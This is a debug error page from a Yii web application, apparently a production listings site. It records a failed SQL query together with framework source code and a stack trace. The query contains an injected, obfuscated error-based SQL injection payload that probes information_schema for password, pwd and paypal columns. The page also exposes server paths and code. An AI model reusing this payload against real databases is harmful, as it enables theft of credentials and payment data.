CDbException

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'order by 1-- - and 'a'='a','38','39','40','41','659','660','661','662','42','...' at line 1. The SQL statement executed was: SELECT `t`.`city_id` AS `t0_c29`, `t`.`category_id` AS `t0_c13`, `t`.`id` AS `t0_c0`, `images`.`id` AS `t1_c0`, `images`.`name` AS `t1_c1`, `images`.`description` AS `t1_c2`, `images`.`title` AS `t1_c3`, `images`.`author` AS `t1_c4`, `images`.`copyright` AS `t1_c5`, `images`.`original_name` AS `t1_c6`, `images`.`link` AS `t1_c7`, `images`.`rank` AS `t1_c8`, `images`.`force_crop` AS `t1_c9`, `images`.`is_logo` AS `t1_c10`, `images`.`is_banner` AS `t1_c11`, `images`.`modified_date` AS `t1_c12`, `images`.`modified_by` AS `t1_c13` FROM `listing` `t` LEFT OUTER JOIN `listing_image` `images_images` ON (`t`.`id`=`images_images`.`listing_id`) LEFT OUTER JOIN `image` `images` ON (`images`.`id`=`images_images`.`image_id`) WHERE ( t.category_id IN ('37' and 1=1 order by 1-- - and 'a'='a','38','39','40','41','659','660','661','662','42','43','44' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','45','46','47','48','49','50','51','52','53','54','55','87','88','89','116' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','117','118','119','120','121','122','123','124','125','126','127','128','129','130','131','132' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570776425 and not t./**/tAbLe_nAmE in(0x666b5f636c69656e74,0x666b5f636c69656e745f313032303135,0x666b5f636c69656e745f636f7079,0x666b5f636c69656e745f6e6577,0x746563686e696369656e,0x757365725f6f6c64) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 6,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','133','134','135','136','137','138','139','140','141','142','143','144','145','146','147','148','149','150','151','152','153','154','155','156','157','158','159','160','161','162','163','164','165','166','167','168','169','403' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570617970616c25 and not t./**/tAbLe_nAmE in(0x69706e73) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','404','405','406','407','408','409') AND t.is_active='1') ORDER BY CASE WHEN t.highlight_end_date>'2024-03-19 07:29:33' THEN 1 ELSE 2 END,CASE WHEN images.id is NOT NULL THEN 1 ELSE 2 END,`t`.rank DESC, `t`.id ASC

/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/CDbCommand.php(543)

531         {
532             if($this->_connection->enableProfiling)
533                 Yii::endProfile('system.db.CDbCommand.query('.$this->getText().$par.')','system.db.CDbCommand.query');
534 
535             $errorInfo=$e instanceof PDOException ? $e->errorInfo : null;
536             $message=$e->getMessage();
537             Yii::log(Yii::t('yii','CDbCommand::{method}() failed: {error}. The SQL statement executed was: {sql}.',
538                 array('{method}'=>$method, '{error}'=>$message, '{sql}'=>$this->getText().$par)),CLogger::LEVEL_ERROR,'system.db.CDbCommand');
539 
540             if(YII_DEBUG)
541                 $message.='. The SQL statement executed was: '.$this->getText().$par;
542 
543             throw new CDbException(Yii::t('yii','CDbCommand failed to execute the SQL statement: {error}',
544                 array('{error}'=>$message)),(int)$e->getCode(),$errorInfo);
545         }
546     }
547 
548     /**
549      * Builds a SQL SELECT statement from the given query specification.
550      * @param array $query the query specification in name-value pairs. The following
551      * query options are supported: {@link select}, {@link distinct}, {@link from},
552      * {@link where}, {@link join}, {@link group}, {@link having}, {@link order},
553      * {@link limit}, {@link offset} and {@link union}.
554      * @throws CDbException if "from" key is not present in given query parameter
555      * @return string the SQL statement

Stack Trace

#8
+
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/models/Listing.php(620): CDataProvider->getData()
615         $categories=Category::getItemsHash($selectedCategoryId);
616     
617         $sortCities=array();
618         $sortProducts=array();    
619         $prices=array();        
620         foreach($dataProvider->getData() as $item)
621         {
622             // City
623             $city=$item->city;
624         
625             $cityMatch=!$selectedCities || ($selectedCities && in_array($city->id,$selectedCities));
#9
+
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/controllers/SiteController.php(296): Listing::getSearchModel()
291                 // $items=$dataProvider->getData();
292                 // $this->actionView($items[0]->id);
293                 // exit;
294             // }    
295                 
296             $searchModel=Listing::getSearchModel();    
297             
298             if ($searchModel)
299             {
300                 foreach($searchModel->found_categories as $categoryItem)
301                     $categoryIds[]=$categoryItem['id'];
#19
+
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/index.php(58): CApplication->run()
53         // header("Location: http://pro.".AP_DOMAIN_NAME."/".$url);
54         // exit;
55     // }
56 
57 require_once($yii);
58 Yii::createWebApplication($config)->run();
2024-03-19 07:29:34 Apache Yii Framework/1.1.14